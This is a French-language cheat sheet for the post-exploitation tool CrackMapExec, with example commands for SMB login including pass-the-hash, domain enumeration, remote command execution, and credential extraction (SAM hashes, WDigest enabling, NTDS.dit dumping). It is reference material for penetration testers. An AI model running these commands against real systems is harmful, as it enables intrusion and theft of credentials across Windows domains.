CrackMapExec
CrackMapExec (CME) - Outil de Post-Exploitation et d'Exploration CrackMapExec étant vraiment un outil très complet je vous conseille cette cheatsheet, plus détaillé
Last updated
CrackMapExec (CME) - Outil de Post-Exploitation et d'Exploration CrackMapExec étant vraiment un outil très complet je vous conseille cette cheatsheet, plus détaillé
Last updated
Description : CrackMapExec (CME) est un outil de post-exploitation en Python qui facilite l'exploration et l'exploitation des réseaux Windows. Il permet aux professionnels de la sécurité d'effectuer une variété de tâches sur des systèmes Windows compromis, y compris l'obtention d'informations d'identification, l'exécution de commandes à distance, l'exploitation de vulnérabilités et bien plus encore.
Exemples d'utilisation :
Connexions & Authentification :
Connexion à un seul hôte :
crackmapexec smb 192.168.215.104 -u user -p PASS
Connexion à plusieurs hôtes :
crackmapexec smb 192.168.1.0-28 10.0.0.1-67 -u user -p PASS
Connexion avec NTLM hash :
crackmapexec smb 172.16.157.0/24 -u administrator -H 'LMHASH:NTHASH'
Enumeration :
Enumérer les utilisateurs :
crackmapexec smb 192.168.215.104 -u user -p PASS --users
Enumérer les groupes de domaine :
crackmapexec smb 192.168.215.104 -u user -p PASS --groups
Enumérer les partages SMB :
crackmapexec smb 192.168.215.138 -u user -p PASSWORD --local-auth --shares
Afficher les sessions actives :
crackmapexec smb 192.168.215.104 -u user -p PASS --sessions
Execution de commandes :
Exécuter une commande avec cmd.exe (privilèges administratifs requis) :
crackmapexec smb 192.168.10.11 -u Administrator -p P@ssw0rd -x whoami
Obtention des Informations d'Identification :
Extraire les hachages SAM locaux :
crackmapexec smb 192.168.215.104 -u Administrator -p PASS --local-auth --sam
Activer ou désactiver WDigest pour obtenir les informations d'identification depuis la mémoire LSA :
crackmapexec smb 192.168.215.104 -u Administrator -p PASS --local-auth --wdigest enable
Extraire le fichier NTDS.dit à partir du contrôleur de domaine (DC) :
crackmapexec smb 192.168.1.100 -u UserName -p PASSWORDHERE --ntds
Extraire l'historique des mots de passe du fichier NTDS.dit :
crackmapexec smb 192.168.1.0/24 -u UserName -p PASSWORDHERE --ntds-history
Options Principales :
smb : Utiliser le module SMB pour interagir avec les hôtes Windows.
-u <nom_utilisateur> : Spécifier le nom d'utilisateur pour l'authentification.
-p <mot_de_passe> : Spécifier le mot de passe pour l'authentification.
--shares : Répertorier les partages SMB sur une machine cible.
-x "commande" : Exécuter une commande sur un système distant.
--exec-method=<méthode> : Spécifier la méthode d'exécution pour l'exploitation.
--exe-file=<fichier_exploit> : Spécifier le fichier d'exploitation à utiliser.